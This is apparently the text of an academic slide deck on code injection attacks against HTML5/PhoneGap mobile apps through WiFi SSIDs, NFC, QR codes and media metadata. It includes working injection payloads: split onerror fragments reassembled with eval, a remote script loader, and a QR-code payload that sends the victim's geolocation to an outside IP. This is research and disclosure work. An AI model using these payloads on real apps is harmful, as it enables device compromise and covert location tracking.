Code Injection Attacks on HTML5-based Mobile Apps Xing Jin, Tongbo Luo, Derek G. Tsui, Wenliang Du Department of Electrical Engineering & Computer Science Syracuse University .
(a) (b) (c) (d) (e) (f) (g) (h)
Outline BackGround Code Injection Attacks on HTML5-based mobile apps Overview of HTML5-based Mobile App Overview of PhoneGap Architecture Risks in JavaScript Code Injection Attacks on HTML5-based mobile apps Overview of the Attack Channels of the Attack Examples (WIFI, NFC, MP3) Length limitation Real Vulnerable Cases Future Work
Overview of HTML5-based Mobile App PhoneGap WebView HTML CSS JavaScript addJavascriptInterface() Device Accelerometer Camera Compass Contacts File Geolocation Notification … Advantage: Can be easily ported between different platforms X X
Overview of PhoneGap Architecture
Risks in JavaScript Data and code can be mixed together. var text="Hello!<script>alert('hello')</script>"; document.write(text); Once it runs, the data will be displayed, and the JavaScript code will also be executed.
Overview of the Attack
Overview of the Attack 2 3 1
Channels of XDS Attack ID Channels (WiFi, Bluetooth) Data Channels Unique to Mobile Devices (NFC, Barcode, SMS) Metadata Channels (MP3, MP4, Image) For the channels we have identified in this paper, we categorized them into three categories. The first one is the ID channels, we can embed code into some identities, e.g., the WiFi SSID, Bluetooth name. The second one is data channels unique to mobile devices, including NFC, Barcode and SMS. The third one is the metadata channels. Media data, e.g., MP3, MP4, Image, they use metadata to describe the detail information of the files, including artist, album, model. We can also successfully inject code into these metadata Fields. Next I will pick one example in each category to show how the attack works.
Example 1(WiFi) Non PhoneGap WiFi-Finder PhoneGap WiFi-Finder
Example 2(NFC) Non PhoneGap NFC App PhoneGap NFC App
Example 3(mp3) Non PhoneGap Mp3 App PhoneGap Mp3 App http://www.cis.syr.edu/~wedu/attack Non PhoneGap Mp3 App PhoneGap Mp3 App
Length Limitation of Channels
Overcome the limitation Use External JS files: <script src=//mu.gl></script> ( will be filter out by innerHTML) Split JS code into pieces: <img src onerror=$.getScript('http://mu.gl')> (need to use jQuery) 1 <img src onerror=a="$.getScr"> 2 <img src onerror=b="ipt('ht"> 3 <img src onerror=c="tp://mu."> 4 <img src onerror=d="gl')"> 5 <img src onerror=eval(a+b+c+d)>
Real vulnerable cases Downloaded 764 PhoneGap apps from Google Play Find several vulnerable apps satisfy two attack conditions: read external data from the channels that we have identified use vulnerable APIs or attributes to display information from the channels
Real Vulnerable Cases Information sent to Sever Non PhoneGap App
Real vulnerable Cases The code injected in the QR code <img src=x onerror= navigator.geolocation.watchPosition( function(loc){ m='Latitude:'+loc.coords.latitude+ '\n'+'Longitude:'+loc.coords.longitude; alert(m); b=document.createElement('img'); b.src='http://128.230.213.66:5556?c='+m })>
Future Work Large Scale analysis of HTML5-based mobile apps Solution to address the attack
Thanks! Q & A